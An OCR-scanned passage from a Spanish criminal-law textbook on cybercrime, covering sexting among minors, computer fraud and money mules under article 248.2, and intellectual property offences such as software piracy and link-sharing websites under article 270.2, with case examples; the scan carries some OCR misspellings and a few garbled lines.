frente a un 2,4% de los de 13 y14 años . Un estudio realizado entre chicas ele 14
y 15 años, revela que el 40% no ve nada malo en sacarse una foto en topless, y 1
de cada 6 chicas ( 16, 7 %) no considera inapropiado posar completamente des-
nuda para otras personas. Según un estudio de la organización ConnectSafely,
las principales razones para producir y/o trasmitir sexting son el noviazgo, el
coqueteo, las bromas, el flirteo, el exhibicionismo, la impulsividad, la diversión,
la venganza, el chantaje o el buscar intimidai; etc., e identifica como los des-
tinatarios más habituales de quienes generan el sexting: alguien que les gusta
(21%); el novio o novia (20%); el ex novio/a (19%); amigos en general (18%);
su mejor amigo/a ( 14%); desconocidos ( 11 % ); compañeros de clase (4%) .

En numerosas ocasiones el delito parte de la recepción de una imagen


o vídeo de contenido sexual que la víctima ha remitido voluntariamente. La

- 247 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

presión del grupo o de la pareja puede ser un motivo para enviar fotogra-
fías, vídeos o mensajes erótico-sexuales (FAJARDO, GORDILLO & REGALADO, 2013;
ALONSO-Rumo, RODRÍGUEZ-CASTRO, PÉREZ-ANDRÉ, JosÉ-MAGALHÁES, 2015). Otros facto-
res sociológicos que pueden llevar al envío de fotografías de contenido sexual
por parte de las víctimas son el avance en la edad, la búsqueda de experimen-
tación sexual, el deseo de atraer la atención de alguien, la intención de regalo
a la pareja, la comunicación en la pareja cuando se encuentran distantes, el
sentirse o ser visto como deseable o ser considerado popular, el deseo della-
mar la atención, el exhibicionismo, estándares bajos en privacidad y modes-
tia, tendencia a la promiscuidad, falta de cultura de privacidad, aprobación de
la pornografía y bajas creencias morales (MERCADO CoNTRERAs, PEDRAZA CABRERA
& MARTíNEZ MARTíNEZ, 2016; AGUSTINA & GóMEz-DURAN, 2016; PÉREZ DíAz, 2017).
Cabe recordar que el sexting, sobre todo entre los jóvenes, es un nuevo modo
de expresión de la actividad sexual propiciado por la utilización de las TIC, de
modo que, en muchas ocasiones, es percibido como un modo de iniciarse en
la sexualidad fuera de la realidad física o como cauce para fantasías sexuales
(KAUR, 2014).

Finalmente, el legislador ha prevísto la imposición de una pena más gra-


ve (en su mitad superior) en tres supuestos :
a) Cuando el responsable fuera el cónyuge o la persona que esté, o
haya estado unida a él (a la víctima), por análoga relación de afecti-
vidad, aun sin convivencia;
b) Cuando la víctima fuera un menor (en cuyo caso se cometerá tam-
bién un delito de pornografía infantil) o una persona con discapaci-
dad necesitada de especial protección;
c) Cuando los hechos se hubieran cometido con finalidad lucrativa.

2. Nuevos delitos contra la propiedad

2.1. Estafas Informáticas (art. 248.2 CP)


El abuso de cajeros automáticos es otro de los comportamientos más
frecuentes entre los ilícitos patrimoniales realizados por medio de sistemas
informáticos. Si bien nos encontrarnos aquí con una nueva modalidad corni-
siva que ha sido preciso regular de manera expresa. Y ello porque la jurispru-
dencia no consideraba posible calificar la conducta como estafa, al entender
que es imposible engañar al cajero automático y que este incurra en error
(STS 185/2006, de 24 de febrero). Lo mismo sucede cuando se accede tele-
máticamente a las cuentas bancarias de un usuario cuyos datos de usuario y

- 248 -
Capitulo 6. CIBERCIÚMENES EN SENTIDO AMPLIO

contraseña se han conseguido fraudulentamente. Los datos de la víctima han


podido conseguirse mediante técnicas de phishing ( enviando correos electró-
nicos que simulan ser del banco en los que se piden las claves por algún pro-
blema de seguridad, etc.) pharming (el correo electrónico incluye un enlace a
una página que simula ser la web de la entidad bancaria, y en la que el usua-
rio introducirá sus datos y claves, entregándolas así sin saberlo al estafador),
o del uso de malware como programas de sni.ffing, keyloogers, etc. En todos
estos casos el usuario proporcionaba sus datos mediante un engaño, pero
no era el engaño el que llevaba a realizar un acto de disposición patrimonial,
como exige el clásico delito de estafa del art. 248.1. Al conseguir la trasferen-
cia del dinero se estaba "engañando" al sistema informático. Hoy en cambio
el uso abusivo de tarjetas o de los datos incorporados en ellas, así como la
consecución de trasferencias de dinero por medio de manipulaciones infor-
máticas, son también considerados expresamente delito de estafa por el art.
248.2, que castiga a quienes con ánimo de lucro y valiéndose de alguna ma-
nipulación informática o artificio semejante, consigan una transferencia no
consentida de cualquier activo patrimonial en perjuicio de otro; a los que fa-
bricaren, introdujeren, poseyeren o facilitaren programas informáticos espe-
cíficamente destinados a la comisión de las estafas previstas en este artículo.
Y a quienes, utilizando tarjetas de crédito o débito, o cheques de viaje, o los
datos obrantes en cualquiera de ellos, realicen operaciones de cualquier clase
en perjuicio de su titular o de un tercero.

2.2. Breve referencia a la.figura de los "muleros"


Aunque parezca un personaje meramente secundario, una figura esen-
cial en la comisión de una estafa a través de las TIC, especialmente las come-
tidas mediante phishing, será la denominada cibermula, o mulero. Se trata de
la persona que recibirá en su cuenta el dinero obtenido de la víctima de la
estafa, dificultando, de esta manera, el descubrimiento de los criminales. Si el
mulero conoce que el dinero que recibe proviene de una estafa y forma parte
por tanto de la organización del delito, será condenado como coautor o como
cooperador necesario de un delito de estafa. Sin embargo, en la mayoría de
las ocasiones no es así. En ocasiones los muleros son a su vez captados por
las organizaciones criminales con engaños, como una oferta de trabajo con
apariencia más o menos real, aunque con unas condiciones laborales muy
sugerentes, en la que se le dice al sujeto que, a cambio de una cantidad o u
porcentaje, debe abrir una cuenta a su nombre, recibir una trasferencia de
dinero y reenviarlo después a los estafadores. Por ello, la jurisprudencia ha
barajado otras opciones de castigo, como por ejemplo el blanqueo decapita-
les del art. 301 CP, cometido bien con dolo eventual (si prevén y cuentan con

- 249 -
Cibercriminalidad.
Tercera parte. LOS CIBERCIÚMENES EN PARTICULAR

la posibilidad de que el dinero recibido tenga un origen delictivo), bien en su


modalidad imprudente (si ignora el origen ilícito de los bienes por haber in-
cumplido el deber objetivo de cuidado).
Ej. 6.6 : Pedro había recibido una propuesta laboral ofreciéndole un por-
centaje de dinero a cambio de aceptar en su cuenta corriente distintas remesas
de cantidades, y remitirlas a Vlado, residente en Ucrania. En ejecución de ese
acuerdo, Pedro remitió 2.350 euros a Vlado, de los 6.700 que había recibido,
no pudiendo remitir el resto porque su cuenta fue bloqueada. En realidad, ese
envío de dinero provenía de la cuenta bancaria de Almudena, a la qu e Imara y
Ferenc lograron acceder telemáticamente previo apoderamiento de sus claves
mediante la técnica del phishing, tras lo que realizaron tres transferencias a la
cuenta de Pedro. Imara y Ferenz cometieron un delito de estafa del art. 248.2.
El Tribunal condenó a Pedro por blanqueo de capitales imprudente, pues se-
gún el tribunal: «... es también evidente que el acusado omitió las más elementa-
les medidas de cuidado al aceptar recibir en su cuenta cantidades de dinero de
procedencia desconocida y actuar como intermediario parn transmitirlas a una
persona situada en Ucrania, pues aun cuando formalmente desconociese la proce-
dencia delictiva de las sumas recibidas, es claro para cualquier per·sona de inteli-
gencia media que la operación que se le solicitaba conducía a ocultar unos bienes
en un lugar de difícil acceso parn la actividad policial, sin que sea necesaria la
intervención de interm ediarios para realizar transferencias lícitas, por lo que su
procedencia delictiva era fácilmente deducible utilizando un mínimo de diligen -
cia» (STS 27.07.2015 ).

Otra de las modalidades de cibermula es el reschipper o reenviador,


que envía paquetes de bienes comprados por Internet por medio de cuen-
tas corrientes ajenas a las que se ha accedido por medio de phishing. (STS
27.07.2015).

3. Nuevos delitos contra la propiedad intelectual

La creación intelectual del ser humano ha sido objeto de protección jurí-


dica en nuestro ordenamiento penal desde la LO 6/1987 de 11 de noviembre
por la que se modifica la Sección III del Capítulo 4.º, Título XIII del libro II del
CP. Se adoptó desde el inicio una perspectiva del bien jurídico protegido en-
teramente patrimonialista, que responde a su ubicación sistemática actual en
este mismo Título XIII, que lleva por rúbrica "Delitos contra el patrimonio y
contra el orden socioeconómico".
Con carácter general y en su acepción restringida, los delitos contra la
propiedad intelectual se ocupan de sancionar conductas que vulneran un haz
de derechos, que protegen, bien al autor de una creación intelectual, ya sea

- 250 -
Capítulo 6. CIBERCIÚMENES EN SENTIDO AMPLIO

literaria, musical, cinematográfica, escultórica, gráfica, etc., o bien al cesio-


nario de los derechos del autor. Concebidos de manera amplia, tendríamos
que incluir los ataques a otra manifestación del ingenio humano representa-
da por la llamada propiedad industrial, que abarca las invenciones, patentes,
marcas, dibujos, modelos industriales o indicaciones geográficas de origen,
títulos todos ellos que en cualquier caso deben ser previamente registrados.
En ambos supuestos, se trata de sancionar conductas especialmente
graves: aquellas cometidas con ánimo de obtener un beneficio económico di-
recto o indirecto, que vulneran los derechos de explotación exclusiva: 1) del
autor o de los cesionarios, en el caso de la propiedad intelectual y 2) de quien
ostenta el título jurídico respectivo, en la propiedad industrial.
Los derechos morales sobre la obra, en el ámbito penal, solo se encuentran
protegidos por la figura del plagio cuando el plagiario persiga una finalidad econó-
mica (art. 270.1) .

La especial gravedad, así definida, es un elemento que permite diferen-


ciar, no sin gran complejidad, al ilícito penal del civil, pues es este último el
orden jurisdiccional históricamente aplicable a estos conflictos.
Tal apostilla es relevante porque los delitos contra la propiedad intelec-
tual, influidos extraordinariamente por la reforma de 2015, contemplan una
serie de conductas digitales absolutamente novedosas, que se apartan del
tradicional modus operandi en la reproducción, distribución y comunicación
pública de una "obra" protegida.
Aunque no podemos afirmar que la técnica legislativa utilizada por el legisla-
dor penal español para la tipificación de estos delitos se corresponda estrictamente
con la que describe a las leyes penales en blanco, lo cierto es que los elementos nor-
mativos que configuran los distintos tipos penales tanto en los delitos contra la pro-
piedad intelectual (art. 270-272) como industrial (arts. 273-277) obligan a acudir a
los conceptos y definiciones expresas en el TRLPI y en la Ley de Marcas, respectiva-
mente, para colmar la tipicidad de ambas categorías.

La reforma del CP de 2015 ha extendido el objeto material de estos de-


litos a otra categoría conexa, los derechos denominados "conexos, afines o
vecinos" que engloban supuestos de atribución del derecho de propiedad in-
telectual a sujetos que no son ni el autor ni el cesionario de la obra en cues-
tión y que se extraen del articulado del TRLPI. De este modo, se incluyen las
interpretaciones artísticas (arts. 105 a 113), las producciones fonográficas
y grabaciones audiovisuales - se entiende que la titularidad de los derechos
recae en los respectivos productores (arts. 114 a 125), las emisiones o tras-
misiones- cuya titularidad recae en las entidades de radiodifusión (arts. 126
y 127), o las simples foto grafías (art. 128), en todo caso objeto de protección

- 251 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

de forma autónoma, es decir, con independencia de que se encuentren o no


ligadas a una obra intelectual stricto sensu.
Ej. 6.7: La grabación audiovisual de una entrevista, un debate, un concur-
so, o la emisión-transmisión de un evento deportivo.

Pues bien, los delitos contra la propiedad intelectual representan qui-


zás la manifestación más visible del uso de las TIC en cuanto a la multiplici-
dad de formas de comisión. Con las TIC y las tecnologías disruptivas, desde
la difusión más rápida y extensa de la canción del verano hasta el acceso a la
última temporada de la serie de moda, los derechos de propiedad sobre las
creaciones intelectuales se han convertido en un blanco relativamente fácil
de explotación económica, ya sea directa o indirecta. Tanto es así que el TRL-
PI establece en su art. 10 que el listado (abierto) de lo que se considera "obra"
se puede expresar por cualquier medio o soporte, tangible o intangible, ac-
tualmente conocido o que se invente en el futuro, y este inciso final comporta
una cláusula abierta respecto del futuro de la evolución tecnológica, de por sí
vertiginoso.
Igualmente, como vimos en el capítulo 4, el Convenio de Budapest le de-
dicó uno de los cuatro apartados clasificatorios de los ciberdelitos, los delitos
relacionados con infracciones de la propiedad intelectual y derechos afines,
esto es, la copia y distribución de programas informáticos, o piratería infor-
mática. Del mismo modo, la protección de la propiedad intelectual ha consti-
tuido uno de los motores de aceleración que ha propulsado la preocupación
por la deriva ascendente de la cibercriminalidad tanto en el ámbito nacional
corno en el internacional (Mrnó LUNARES, 2007).
Es oportuno precisar que, contrariamente, la valoración social de la pro-
piedad intelectual, a raíz de la explosión de las TIC en la Sociedad de la Infor-
mación, ha sufrido una profunda merma, impulsada y sostenida por la prácti-
ca habitual de millones de usuarios que descargan contenidos audiovisuales,
literarios o científicos en Internet (la denominada ciberpiratería digital) sin
reparar en el daño que ocasionan, pues de manera gratuita y con un solo clic,
la obra es lograda instantáneamente desde cualquier emplazamiento que
cuente con acceso a la Red.
Ahora bien, el usuario debería plantearse que nada es nunca totalmente gra-
tis. Como afirmaba SHAPIRO ( 1999), los sitios web, a cambio de ofrecer su material de
manera gratuita, recopilan subrepticiamente datos tales como quién es el provee-
dor de servicios de Internet, qué sitios visitamos más reciente o asiduamente, o qué
navegador estamos usando, y es evidente que toda esta información puede generar
beneficios derivados.

- 252 -
Capitulo 6. CIBERCIÚMENES EN SENTIDO AMPLIO

Sin embargo, los ciudadanos todavía no han asumido que esas conduc-
tas puedan ser constitutivas, no ya de ilícitos penales, sino también de ilícitos
de naturaleza administrativa y civil (GARCíA RlvAs, 2019) . La dimensión eco-
nómica del problema también es ambigua, sobre todo si tenemos en cuenta
que la mayor parte de los análisis estadísticos son desarrollados a instancias
de la industria afectada (grandes compañías discográficas o grandes medios
audiovisuales) y que el intercambio gratuito de archivos entre usuarios - en
nuestros días bajo el sistema de intercambio con un protocolo P2P (ya ade-
lantamos que esta modalidad es ílicita pero atípica (no delictiva) cuando no
se realiza con ánimo comercial (GIL GIL &'MARTÍN FERNÁNDEZ, 2009) ha eclipsado
a la mayoría de las conductas de explotación ilícita de obras protegidas (MIRó,
2015). Asimismo, las descargas ilegales han sufrido un fuerte descenso, he-
cho probablemente más ligado al éxito de la vía streaming, que no requiere
la descarga previa del archivo porque se almacena de modo temporal en un
espacio de memoria llamado buffer, que a la labor que ha desempeñado tanto
el TRLPI como el propio CP.
Ej. 6.8 : Conforme a un estudio publicado por el Observatorio de la Pira-
tería respecto ele los Hábitos de Consumo de Contenidos Digitales (2018), en
España cada vez se accede menos a contenidos ilícitos, aunque el nivel de pira-
tería todavía permanece elevado. Se asegura que el perjuicio en 2018 para las
industrias fue ele 1.923 m illones de euros, que las arcas públicas dejaron de per-
cibir 638 millones de euros y que se podrían haber creado 131.262 puestos de
trabajo directos e indirectos. En cuanto al consumo ilícito por sectores (música,
videojuegos, series, prensa, películas, libros, fútbol y partituras), ha aumentado
ligeramente el número de consumidores de forma legal y el consumo ilícito ha
disminuido . En cuanto a la efectividad de las mecliclas contra los accesos ilícitos,
8 de cada 10 encuestados consideran que las medidas más efectivas contra los
accesos ilícitos son el bloqueo ele páginas web con contenidos ilícitos y las san-
ciones a los proveedores de Internet. Por el contrario, las menos efectivas son
las sanciones a los usuarios 1.

A continuación, desarrollaremos exclusivamente los nuevos delitos con-


tra la propiedad intelectual.

3.1. Tipos de ciberpiratería relacionados con el software


Antes de analizar en concreto los nuevos preceptos que han revoluciona-
do la tipificación de los delitos contra la propiedad intelectual, nos detenemos
en los diferentes medios de ciberpiratería de software desde una perspectiva

1 Coalición de creadores e industrias de contenidos. Disponible en: http://lacoalicion.


es/observatorio-de-la-pirateria / observatorio-de-la -pirateria-2018/

- 253 -
Ci bercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

fenomenológica, con la salvedad expresa de que algunas de estas figuras son


manifestaciones atípicas, como la pitaría del usuario final. Otras serán típicas
dentro de las nuevas formas comisivas, a través de las TIC, de los delitos con-
tra la propiedad intelectual tradicionales. Es decir, resultarán subsumibles en
las conductas que tipifica el art. 270.1, analizado en los siguentes epígrafes.

Tipos de ciberpiratería

a) Falsificación de software: Consiste en duplicar, distribuir o vender de for-


ma ilegal material protegido por copyright imitando al producto original ( en el mo-
delo anglosajón, el copyright corresponde a los denominados derechos de autor en
el modelo continental, y atiende más a los aspectos patrimoniales de la propiedad
intelectual que a los morales). En el caso de software empaquetado, incluye copias
falsificadas de los manuales, acuerdos de licencia, etiquetas, tarjetas de registro o
elementos de seguridad que acompañan la imitación fraudulenta del paquete de
productos.
b) Piratería en Internet: Se produce al subir (uploading) o descargar (down-
loading) software de Internet, y está sujeta a las mismas reglas que rigen las com-
pras efectuadas en formato de disco compacto. Las técnicas más habituales son: la
descarga gratuita o el intercambio de software en sitios web; la oferta de software
falsificado o mediante canales ilegales a través de sitios de subastas en Internet; o la
transferencia de programas con copyright en redes de punto a punto.
c) Carga en disco duro: Sucede cuando una empresa vende equipos nuevos
con copias ilegales de software cargadas en el disco duro para, de este modo, conse-
guir mejores precios de oferta y fomentar la compra de dichos equipos.
d) Uso excesivo de cliente-servidor: Aquí la característica radica en la utili-
zación sincrónica y excesiva por parte de los usuarios de la copia central de un pro-
grama en la Red. Se considera "uso excesivo" la superación del número de usuarios
que permite la licencia del software.

- 254 -
Capítulo 6. CIBERCIÚMENES EN SENTIDO AMPLIO

e) Piratería de usuario final: Actualmente es la más extendida, aquí el "pi-


rata" es el usuario, la persona que interactúa con el programa, que generalmente
desconoce la ilicitud de su propia conducta, y que no necesariamente coincide con
el propietario del software, que puede ser otra persona física o jurídica.

Ej. 6.9: Ramón, Carla y Raquel son empleados de una compañía que
es la propietaria del softwar·e con el que trabajan en la corporación, y del
que esta ha contratado 200 licencias. A pesar de no contar con la debi-
da autorización, reproducen unas cuantas copias del software superando
sin saberlo las licencias contratadas, para instalar el programa en diver-
sos equipos domésticos de familiares y otros allegados (uso excesivo ele
cliente-servidor y ejemplo simultáneamente ele piratería de usuario final).

3. 2. El giro revolucionario en la criminalización de las páginas web de enlace


(art. 270.2 CP)
El artículo 270. 2 dispone:
La misma pena se impondrá a quien, en la prestación de servicios de la socie-
dad de la información, con ánimo de obtener un beneficio económico directo o indi-
recto, y en perjuicio de tercero, facilite de modo activo y no neutral y sin limitarse a
un tratamiento meramente técnico, el acceso o la localización en internet de obras
o prestaciones objeto de propiedad intelectual sin la autorización de los titulares
de los correspondientes derechos o de sus cesionarios, en particular ofreciendo
listados ordenados y clasificados de enlaces a las obras y contenidos referidos an-
teriormente, aunque dichos enlaces hubieran sido facilitados inicialmente por los
destinatarios de sus servicios.

El art. 270.2 representa una modalidad adicional a las contempladas en


el tipo básico común, con el que comparte la misma pena de prisión y multa.
La inclusión de este precepto viene a criminalizar una conducta que con ante-
rioridad resultaba, en opinión de muchos, impune, al no realizar el adminis-
trador o responsable de la página web o del servicio P2P la conducta recogida
en el art. 270. 1, ya que no era él mismo el que comunicaba públicamente,
reproducía o distribuía la obra protegida, sino que solo proporcionaba el en-
lace a otras webs o servicios que sí lo hacían (GrL GrL &MARTÍN FERNANDEZ, 2009;
TIRADO E STRADA, 2016).

Ej. 6.10: La reciente sentencia absolutoria de los administradores de la


página web Seriesyonkis de un delito contra la propiedad intelectual (Senten -
cia Juzgado de lo Penal núm. 4 de Murcia, ele 21.06.2019) invoca la laguna le-
gal existente con anterioridad a 2015, que no permitía sancionar penalmente
la conducta de enlazar a otras webs con contenidos protegidos por los derechos
de propiedad intelectual. Esta importante resolución contiene un análisis com-

- 255 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

pleto de la jurisprudencia anterior, que lejos de pacifica, ha resultado muy con


trovertida.

Ej. 6.11: Otro asunto paradigmático anterior que la doctrina considera


auténtico inspirador de este nuevo apartado 2, es el asunto Youl<ioske. Mediant
el acceso a la página www.youkioske.com se podía acceder vía streaming a re•
vistas, libros y publicaciones periódicas sin la autorización de los titulares de
los derechos sobre las obras. En realidad, las obras se alojaban en servidores
virtuales en EEUU y Francia y, a pesar de la gratuidad del acceso a los conteni-
dos, Youkioske obtenía ganancias que provenían de la publicidad (mediante el
sistema de banners y videos pre rol/ que aparecían de forma permanente en los
laterales o en el centro de la página web justo antes de exhibirse el contenido
seleccionado por el usuario) . En este caso, la AN dictó sentencia condenatoria
contra los gestores de la web con apoyo expreso en la doctrina Svensson (que
explicamos a continuación) acerca de lo qu e se consid era comunicación públi-
ca, pues los hechos también son anteriores a la entrada en vigor de la reforma
de 2015. La condena fue confirmada por el TS (sentencia de 12.12.2016) tras
solicitar a la AN que revisara determinadas cuestiones terminológicas y fácticas
de la sentencia que dificultaban la valoración del caso. El TS concluye que, dado
que las obras enlazadas solo podían obtenerse comprando la edición en papel o
mediante suscrición de pago a la publicación digital, los enlaces impli caban ac-
tos de co municación a un público nuevo, que permitían a los usuarios obviar las
condiciones de acceso y difusión autorizadas por los respectivos titulares. Hay
que señalar, sin embargo, que en el caso de Youkioske eran los propios miem-
bros de la organización criminal los que copiaban y subían las obras pirateadas,
por lo que el supuesto no es similar al de Seriesyonkis, donde solo se limitaban a
enlazar, como reconoce la sentencia del Juzgado de lo Penal n. 4 de Murcia.

Por lo dicho tampoco se puede entender la inclusión de este precepto sin aten-
der brevemente a la doctrina del TJUE en el caso Svensson, de 2014, que vino a acla-
rar las obligaciones de los Estados de prohibir estas prácticas. Un tribunal sueco
planteó una cuestión prejudicial sometiendo a decisión varias cuestiones relacio-
nadas con el hecho de conocer si la actividad de una página web que proporciona a
los usuarios determinados links que permiten el acceso a obras y otras prestaciones
protegidas, debe considerarse un acto de comunicación pública o no, en el sentido
de lo expresado por el art. 3.1 de la Directiva 2001/29/CE del Parlamento Europeo
y del Consejo, de 22 de mayo de 2001, relativa a la armonización de determinados
aspectos de los derechos de autor y derechos afines a los derechos de autor en la
sociedad de la información. La sentencia indica que el término "público" se refiere
a un número indeterminado de destinatarios potenciales e implica un número con-
siderable de personas. En síntesis: 1) La facilitación de dichos hipervínculos consti-
tuye una forma de comunicación pública por la puesta a disposición; 2) El derecho
exclusivo de autorizar la provisión de esos enlaces corresponde a los titulares de los
derechos sobre las obras; 3) En consecuencia, el derecho de comunicación pública

- 256 -
Capitulo 6. CIBERCIÚMENES BN SENTIDO AMPLIO

de los titulares se infringe en el caso de que se faciliten obras mediante enlaces sin
la previa autorización (extensamente TIRADO E STRADA, 2016 ).
La regulación elegida por el legislador español, criminalizando la conducta
con una formulación cuasi literal extraída del TRLPI es, sin embargo, de por si cues-
tionable. La remisión en bloque aplicada por el legislador penal parece poco respe-
tuosa con los limites entre el plano sancionador administrativo y el penal (G ARC IA
RlvAs, 2019) . Parte de la doctrina y la jurisprudencia habla propuesto un tratamiento
no penal de estas conductas, con obligaciones y sanciones de tipo administrativo
(GIL GIL & MARTtN FERNÁNDEZ, 2009, AJP N. 4 Cartagena, 17.04.2008).

El precepto exige el mismo ánimo de obtener un beneficio económico di-


recto o indirecto, corroborándose así el carácter patrimonial de los derechos
que protege.
En relación con la interpretación del elemento subjetivo exigido, lo pri-
mero que debe destacarse es que el precepto no acoge la incriminación del
intercambio gratuito de archivos P2P. A efectos de despejar dudas sobreve-
nidas, la Fiscalía General del Estado estableció ya desde 2006 una interpre-
tación restrictiva del ánimo de lucro que traspasa después al beneficio indi-
recto mediante la Circular 8/2015, de 21 de diciembre, declarando que este
no alcanza al mero ahorro que supone el impago del servicio que se obtiene
de la reproducción de la obra o prestación no autorizada, es decir, que todos
aquellos supuestos de copias para uso privado, videos comunitarios, etc., no
son penalmente relevantes 2• En cambio, sí se considera beneficio indirecto
el rendimiento obtenido por la publicidad insertada en las páginas web que
permiten acceder a contenidos protegidos o no autorizados, por ejemplo, a
través de banners o de videos pre roll (mostrados al iniciarse el contenido
de manera que el usuario tiene que visionarlo(s) si desea llegar al contenido
realmente buscado. Otros mecanismos de obtención de beneficio pueden ser
los pop-ups y pop-under (publicidad a través de ventanas emergentes en vez
de inserta en la página web que caracteriza al banner), la cesión de cuentas e-
mail de los usuarios a terceros que se benefician incrementando sus bases de
datos con los de nuevos e hipotéticos clientes (para ello en ocasiones solicitan
un registro previo al acceso), enlaces a tiendas on-line o a material pornográ-
fico a cambio de una comisión por cada acceso del usuario redireccionado, o
el establecimiento de cuentas de acceso de pago del tipo Premium, más velo-
ces y sin carga publicitaria, como las utilizadas por Spotify, Academia.edu, etc.

2 Circular de la FGE 8/2015, de 21 de diciembre, sobre los delitos contra la propiedad


intelectual cometidos a través de los servicios de la sociedad de la información tras la refor-
ma op erada por Ley Orgánica 1/201 5. Disponible en: https://www.fiscal.es/memorias/ estu-
dio2016/ CIR/ CIR_08_20l5.html

- 267 -
Ci bercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

En este caso, la amenaza penal se dirige a la persona física o jurídica que


pone a disposición del público en general una página web que permite enla-
zar a contenidos para su descarga o reproducción temporal - facilitar el acce-
so a obras o prestaciones objeto de propiedad intelectual sin la autorización de
los titulares, todo ello en el marco de la prestación de servicios de la sociedad
de la información. Así, amén del TRLPI, la Ley 34/2002, de 11 de julio, de
Servicios de la Sociedad de la Información y el Comercio Electrónico ( en ade-
lante LSSICE), afecta a este ciberdelito de manera singular.
A los efectos de la responsabilidad penal hemos de distinguir entre el
uso que cada internauta hace de la red P2P (que no es susceptible de consi-
derarse intermediador) y el uso que de dicha red hace el responsable de la
página web que enlaza o redirecciona al usuario a la misma (que sí lo es). De
entrada, requiere la presencia de una serie de requisitos cumulativos que en
ocasiones admiten conceptos jurídicos indeterminados cuyo alcance deberá
ser concretado por la jurisprudencia (GARCÍA RivAs, 2019):
1) Que el sujeto participe adquiriendo conocimiento o control de los
medios por los que se facilita el acceso o la localización de las obras
o prestaciones ofrecidas ilícitamente, en la vulneración de los dere-
chos de propiedad intelectual de forma significativa (se determina-
rá en función del volumen de descarga o del nivel de audiencia de la
web en España).
2) Que el sujeto desarrolle una labor específica de mantenimiento y
actualización de las correspondientes herramientas tecnológicas,
concretamente ofreciendo listados ordenados y clasificados de en-
laces a las obras y prestaciones, aunque dichos enlaces hubieran
sido facilitados inicialmente por los destinatarios del servicio.
3) Que el responsable no se limite a un tratamiento meramente téc-
nico o automático de los datos facilitados por terceros con los que
no mantenga una colaboración, control o supervisión (este requisi-
to se introdujo por sugerencia expresa del Consejo de Estado en su
obligado Dictamen y figuradamente alude a los grandes motores de
búsqueda).
Existen dos alternativas en cuanto al modus operandi:
a) Desde la página web se enlaza a un servidor externo de gran capaci-
dad donde las obras o prestaciones se encuentran alojadas y al que
los usuarios acceden precisamente a través de ese vínculo.

- 258 -
Capítulo 6. CIBERCR.ÍMENES BN S NT

b) Desde la página web se establee n nl


río pincha uno de los links sistem z
ceder inmediatamente al cont nido 1 gido, acceso que se realiza
a partir de los programas de int r mbio de archivos P2P. En este
sistema de transferencia de archivos entre usuarios, estos actúan a
la vez como servidores y clientes porque los contenidos ilícitos ob-
jeto de trueque se encuentran alojados en sus respectivos equipos.
Existen diversos tipos de programas de intercambio como eMule,
BitTorrent, Azureus, eDonkey, etc.
Por otra parte, es un delito común que puede ser cometido por cualquie-
ra, ahora bien, la figura del ciberdelincuente en esta infracción se fusiona con
la del denominado realaser (enlazador) es decir, la persona que enlaza los
contenidos en la web, y que con la ayuda de los cyberlockers o megaservidores
(alojadores o responsables de servicios de alojamiento de archivos), enlazan
desde diversas webs a los archivos que han subido previamente los uploaders
a esos grandes servidores, a cambio de percibir ingresos con metodologías
diferentes (como se ha explicado supra).
Se excluye en este caso la responsabilidad penal de los usuarios al men-
cionar que la conducta mantendrá su carácter prohibido, aunque dichos enla-
ces hubieran sido facilitados inicialmente por los destinatarios de sus servicios,
un ejemplo más de la atipicidad de la conducta del usuario final.
Además, la particularidad establecida por el legislador de que la web
ofrezca listados ordenados y clasificados de enlaces a las obras implica una
manipulación solo atribuible al propio sujeto enlazador de esos contenidos.
Ej. 6.11: La doctrina entiende que la expresión "facilitar de modo activo y
no neutral y sin limitarse a un tratamiento meramente técnico", constituye un
elemento objetivo de la tipicidad que representa una muralla excluyente de los
motores de búsq ueda que pertenecen a determinadas cyber big corporations:
Google, Mozilla Firefox, Yahoo, Bing, Youtube, etc., principales motores de bús-
queda . En principio funcionan como agentes neutrales porque no exceden la
mera intermediación técnica, se supone que no relacionan contenidos, ni elabo-
ran listas dirigidas a los gustos, usos o preferencias de los usuarios.

Sin embargo, no contamos con ninguna resolución penal condenatoria


en este concreto ámbito hasta la fecha.
Ej. 6.12: Álvaro, Nick y Gorka crean varias páginas web de manera conse-
cutiva con parámetros que incluyen URL y con un diseño muy atractivo y ópti-
mo para enlazar a otras páginas web desde las que se pueden descargar o visio -
nar en streaming películas recién estrenadas en salas de cine norteamericanas,

- 259 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

que ni siquiera se han estrenado en Es paña. Los enlaces utilizan en sus pará-
metros las expresiones "pelisalacarta.com" "pelisalclick.se" y "verified", que
sirven para acceder a un megaservidor externo, lugar donde previamente los
uploaders ajenos han alojado los archivos con los contenidos. Los hipervínculos
(links) están muy bien estructurados, ordenados y clasificados según diferentes
criterios: orden alfabético, género, contenido, últimos estrenos, nuevas incor-
poraciones, precedidos en ocasiones de una sinopsis de la cinta y de su carátula
correspondiente, y además cuenta con un foro de discusión. Las películas no
aparecen como visibles para cualquiera que las busque directamente en el me-
gaservidor. La web se aloja en los servidores de la empresa Blander Servidores
SL, que proporciona servidores de uso exclusivo para los clientes con códigos y
contraseñas, con escasa capacidad de memoria (80 Gb), lo que impide el aloja-
miento directo del contenido audiovisual al que redirigen los enlaces, pero que
sin embargo permite recib ir gran volumen de visitas.

El siguiente apartado (art.280.3) estipula la retirada de las obras o pres-


taciones por el juez o tribunal con carácter general, medida que será de apli-
cación preferente en los supuestos incardinados en el tipo básico común del
art. 2 70.1. Además, se prevén dos medidas específicas en el caso de los pres-
tadores de servicios de la sociedad de la información (art.270.3) consistentes
en: la interrupción del servicio y el bloqueo del acceso en aquellos casos de
reiteración de la conducta, junto con cualquier otra medida cautelar de pro-
tección de los derechos de propiedad intelectual que el juez o tribunal estime
oportuna. Hay que tener en cuenta la limitación de responsabilidad del pres-
tador de servicios que establecen los arts. 14, 16 y 17 de la LSSICE, que no
operará cuando el prestador del servicio conoce que alberga actividad ilícita
y no actúa para retirarla o imposibilitar su acceso.
Ej. 6.13: Una página web infractora que se encuentre radicada en España
ven1 interrumpido el servicio, lo que permite su clausura. En cambio, la medi-
da de bloqueo de acceso procede cuando la página web infractora se ubique en
otro país, y necesitará el apoyo de los prestadores de servicios de intermedia-
ción cuya función será la de impedir que desde España sea posible acceder a la
página infractora extranjera.

